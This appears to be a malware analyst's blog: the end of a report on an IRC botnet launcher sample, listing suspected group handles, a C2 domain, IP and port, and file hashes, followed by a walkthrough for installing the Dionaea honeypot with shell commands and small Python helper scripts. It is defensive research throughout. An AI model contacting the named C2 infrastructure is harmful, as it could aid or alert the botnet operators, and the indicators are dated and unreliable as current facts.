I’ve found a few mirrors of defaced websites from uNKn0wn Crew and the names I saw associated with those were bebo and warbody. This was from 2004, however. In the #Balengor channel, which I presume is used for C2, there is a topic set by “k” which appears to be a base64 encoded string. Modes are set by an “e.TK” on the server. At this point, the possible identities I’ve seen from this group are:

– iD
– e.TK
– k
– bebo
– warbody

BEAR30

I can’t say that I’ve heard of this group or these people, though I would point out that there used to be a flash cartoon on newgrounds.com about a cat named Beebo, so maybe this person was a fan of that series.

Summary

It’s been an interesting and somewhat frustrating exercise to go through this sample due to all of the anti-analysis features in place here. Recovery of the payload is great, and my next step is to analyze that payload. Even without the analysis of the payload, we do know that this sample adds the host machine to a botnet and allows robust C2 functions to be run on the victim machine. We also discovered something about the group responsible for it.

There wasn’t a name associated with this sample when submitted to the online sandboxes. Referring to it by its MD5 hash is cumbersome, so I’m going to assign this a name. Since this is related to botnets and this is the first part of a multi-part sample, I’m going with single syllable B reporting names. I’m going to call this one BEAR.

References:
csrc.nist.gov/archive/aes/rijndael/Rijndael-ammended.pdf
https://en.wikipedia.org/wiki/Advanced_Encryption_Standard

Findings and observations:
This sample is essentially a launcher for an encrypted payload. This overall malware package establishes C2 via IRC and allows for a robust level of control on infected machines. This malware also indicates that it can be used for typical botnet operations (e.g., scanning for new victims, exploiting targets, etc.).

Recommendations:
When this sample was run as a regular (unprivileged) user, it appeared unable to fully execute, though it still appeared to establish C2. Keeping regular users at appropriate (non-admin) levels of access appears to impede this sample’s operations. Specifically, running as a regular user should prevent the sample from achieving persistence, which would result in the sample no longer running on the host after a reboot.

C2, for the time being, is located at her.d0kbilo.com (currently resolving to 37.59.118.41) on port 4466. Restricting access to this domain, IP address and port would impede or eliminate the C2 function.

Conclusion:
A skillfully executed bot client that uses multiple anti-analysis techniques to hamper the analyst.

Report: MalEXE001

Hashes:
MD5:fcc038bc5b7297dffa9a78424c71674f
SHA1:ba71062e5266b3e70e3e15b2d963ec7d5e375933
SHA256:f6fb4bde73ca1fff1fc90cff03f5c8255467b8b3d7f54330f39ecc3fa48f0e51
ssdeep:1536:W/sLo8xocXN5U3FjAXScUC30SWEk4JgTqkKk6YqwFYtitK2TZ:WEL9okN5U3FjtQ0SWyJgT5D6wK2

 

I’m FRIENDLY-SCANNER, and so can you

For the TL;DR on setting up Dionaea, see below

Lately I’ve been pretty disappointed in the kinds of attachments I’ve been receiving in my various emailboxes. Adwind (both iterations) was pretty interesting to see, but I’m noticing that a lot of what I receive is just a more formatted, fancier 419 scam. I’m basically just seeing various versions of “I’m a Nigerian oil minister, please send me your bank details” in a document attachment. I’ve actually even gotten one sender to resend their attachment as a PowerPoint file.

A couple of things occur to me. One is that these might be files that take advantage of vulnerabilities in older versions of the software I am running, so when I open them in my current test environments I’m not really seeing anything happen. Going forward I’m going to run much older versions of my applications to see if anything different happens. For instance, I just put Acrobat Reader 5.0 on one of my testing VMs and used that to open a recent attachment during examination (though nothing happened with this ancient version of Acrobat, either). Another explanation is that these might just be exactly what they appear to be: prettier versions of the same crap that fills my inbox on a daily basis, but not much more than that.

I think it’s OK to continue checking my email attachments for stuff to analyze, but I also recognize that I need better samples, ideally Windows executables which I’m more knowledgeable about than documents. I decided to try setting up a honeypot to see if I could get anything interesting. I ran into various roadblocks along the way before I got something up and running, but hopefully detailing what happened might help others avoid some of these issues.

The first thing I noticed is the somewhat fragmented state of the various open-source honeypots out there. Dionaea was the most recommended one from various sources, but the original site (http://dionaea.carnivore.it/) is out of service and most material I managed to find about the software was from several years ago. I tried another honeypot, Amun, but that seemed sort of defunct at this point also. The last update (from 2012) stated that it was still being maintained, but the documentation section had most of the links struck out so it was a bit hard to figure out exactly what to do with it.

I decided to use my testing machine as the host for the honeypot since it’s already running Ubuntu. I got Amun set up on it and got it running, but strangely there seemed to be very little activity (something on the order of 3-4 pieces of traffic over a 2-3 day period). This seemed VERY strange to me — I was thinking that there would likely be hundreds of scans per day at least. I tried various things to get things working better:
– Disabled the firewall on the host
– Added the host machine to the router’s DMZ, in case NAT or something else was the issue
– Temporarily disabled all security features on the router and watched for any change
– Connected the host directly to the cable modem, bypassing the router entirely

Finally after about five days, I ended up with six scans. Something just didn’t seem right.

I decided that I would have to give Dionaea a try. Installing using repositories didn’t work, so I had to find out everything I’d need to install manually and then install from source. I’d also need to find the source since the main site wasn’t around anymore.

This site had the best set of Dionaea docs I could find. You can also find some info about using Dionaea in the second chapter of Malware Analyst’s Cookbook (specifically, recipes 2-4 through 2-9). I installed Dionaea from PhiBo’s GitHub repository, but I also mirrored it to my newly created one since I feel like the world could always use more copies of this lying around.

Here are the steps I followed, largely following the instructions from the readthedocs.io link above. For the benefit of anyone who doesn’t do this often (or maybe is doing this for the first time), I’m putting explicit directions on what commands to enter:

  1. Update packages:
    sudo apt-get update
    sudo apt-get dist-upgrade
  2. If you don’t already have it installed, install git:
    sudo apt-get install git
  3. Install all Dionaea dependencies (note libnl-3-dev: if you try to install the original libnl-dev mentioned in the docs you’ll get an error about it not existing, but you can use libnl-3-dev instead):
    sudo apt-get install \
        autoconf \
        automake \
        build-essential \
        check \
        cython3 \
        libcurl4-openssl-dev \
        libemu-dev \
        libev-dev \
        libglib2.0-dev \
        libloudmouth1-dev \
        libnetfilter-queue-dev \
        libnl-3-dev \
        libpcap-dev \
        libssl-dev \
        libtool \
        libudns-dev \
        python3 \
        python3-dev \
        python3-yaml
  4. Put the repository in /opt/dionaea (use either of the repositories above, as an example I’ll use the one I created):
    sudo git clone git://github.com/BYEMAN/dionaea.git /opt/dionaea
  5. Run the following commands:
    cd /opt/dionaea
    
    sudo autoreconf -vi
    
    sudo ./configure \
     --disable-werror \
     --prefix=/opt/dionaea \
     --with-python=/usr/bin/python3 \
     --with-cython-dir=/usr/bin \
     --with-ev-include=/usr/include \
     --with-ev-lib=/usr/lib \
     --with-emu-lib=/usr/lib/libemu \
     --with-emu-include=/usr/include \
     --with-nl-include=/usr/include \
     --with-nl-lib=/usr/lib
    
    sudo make
    
    sudo make install
  6. To start an instance of Dionaea, you can just run it as a superuser, but I typically run it as a daemon and write the PID to a file, as suggested in the Malware Analyst’s Cookbook:
    sudo /opt/dionaea/bin/dionaea -p /opt/dionaea/var/dionaea.pid -D

    That should be all you need to do in order to get the software itself running. How it works for you once up and running is another topic.
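
To confirm that the daemon actually stayed up after step 6, one option is to read the PID file back and ask the kernel whether that process still exists. The following is only a minimal sketch, assuming the PID file path used in the command above; the function name is made up for illustration, and the check only proves that some process with that PID is alive, not that it is Dionaea.

```python
import os
from pathlib import Path


def dionaea_is_running(pid_file: str = "/opt/dionaea/var/dionaea.pid") -> bool:
    """Return True if the PID recorded in pid_file belongs to a live process.

    The default path matches the -p argument used when starting the daemon.
    """
    try:
        pid = int(Path(pid_file).read_text().strip())
    except (OSError, ValueError):
        # Missing or unreadable PID file, or contents that are not a number.
        return False
    if pid <= 0:
        return False
    try:
        # Signal 0 performs the existence check without delivering a signal.
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        # The process exists but is owned by another user (for example root).
        return True
    return True
```

Calling dionaea_is_running() with no arguments checks the default path; a False result usually means the daemon exited or the PID file was never written.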

Shortly after getting the honeypot running, I noticed LOTS of logging activity, and within about 5 hours 2700 scans had come in. Obviously much different than with Amun. I’m not sure why, but I also didn’t look into it since I was just happy to have a honeypot up and running.
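
For a rough breakdown of where those scans are landing, the SQLite log that Dionaea can write is a convenient source. The sketch below is hedged: it assumes the SQLite logging handler is enabled and that its database has a table named connections with a local_port column. The database location differs between versions, so the path is left as a parameter, and the function name is hypothetical.

```python
import sqlite3


def scans_per_port(db_path: str) -> list:
    """Return (local_port, connection_count) pairs, busiest port first.

    Assumes a 'connections' table with a 'local_port' column, which is an
    assumption about the log schema; adjust the query if yours differs.
    """
    query = (
        "SELECT local_port, COUNT(*) AS hits "
        "FROM connections "
        "GROUP BY local_port "
        "ORDER BY hits DESC, local_port ASC"
    )
    conn = sqlite3.connect(db_path)
    try:
        return conn.execute(query).fetchall()
    finally:
        conn.close()
```

If the table or column does not exist in your version, sqlite3 raises an OperationalError, which is a quick way to find out that the schema assumption is wrong.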

After a couple of days, I had collected lots of traffic and recorded many sessions but didn’t manage to collect any binaries, which is really what I’m after here. I did some reading online and I saw some suggestions that quite often any binaries come in over the ports for SMB (445) and MSMQ (1801 and others). Googling revealed that my ISP blocks these ports for residential customers (though not for business users), and checking with canyouseeme.org confirmed that my machine was unreachable through these ports. I needed to get something, somewhere that would allow me to run the honeypot without these restrictions.
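
The same reachability test can be done by hand from any machine outside your own network. This is a minimal sketch, not a replacement for the web checkers: the function name is made up, and it has to be run from a host on the other side of your ISP (running it on the honeypot itself tells you nothing about upstream filtering).

```python
import socket


def tcp_port_open(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and unreachable hosts alike.
        return False
```

For example, tcp_port_open("your.public.ip", 445) coming back False from an outside host while the honeypot is listening on 445 is consistent with the ISP dropping that port, though a local firewall would produce the same result.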

Someone I know recommended getting something on Digital Ocean and setting up a honeypot there. I signed up with them and so far I have to tell you that I’m pretty thrilled with them. I got the cheapest “droplet” which comes to $5 a month, and set it up with Ubuntu 16.04 and the honeypot. You can confirm what ports are open on their systems with ping.eu, but I also emailed their support before I signed up and got the following response:

We do have a few restrictions, on UDP port 80 traffic, and SMTP over IPv6, both to prevent abuse and which cannot be lifted. Otherwise, we don’t [have] any network restrictions, so as long as your software is compatible with the Linux or FreeBSD distributions that we offer, it should run just fine.

Another thing that I thought was nice about them is that you can locate your droplet in datacenters in various parts of the world. I picked one in NYC, but I’m thinking about getting some set up in other regions to see if I get different traffic there. If you want to sign up, use this link and you’ll get $10 in credit from Digital Ocean assuming you’re new to them.

I spent an evening getting my droplet set up and installing Dionaea, and then let it run overnight. At 0753 the next morning:

[Screenshot: ls -l output]

And look how it begins:

[Screenshot: file contents beginning with MZ]

Nice.
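
Checking for that MZ signature is easy to script once more files start arriving. Here is a minimal sketch with hypothetical function names; the directory you pass in is whatever folder your Dionaea install saves downloads to, which I am not assuming here. The two-byte check only identifies the DOS header magic, so a match is a candidate Windows executable, not a validated PE file.

```python
from pathlib import Path


def looks_like_pe(path) -> bool:
    """Return True if the file starts with the two-byte 'MZ' signature."""
    with open(path, "rb") as fh:
        return fh.read(2) == b"MZ"


def find_pe_candidates(directory) -> list:
    """Return the sorted paths of regular files in directory that start with MZ."""
    return sorted(
        p for p in Path(directory).iterdir()
        if p.is_file() and looks_like_pe(p)
    )
```

Pointing find_pe_candidates() at the download folder gives a quick list of files worth pulling into the analysis VM first.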

Oh yeah, referring to the title — one of the first scans I received was from something identifying itself as “FRIENDLY-SCANNER”. Seems legit.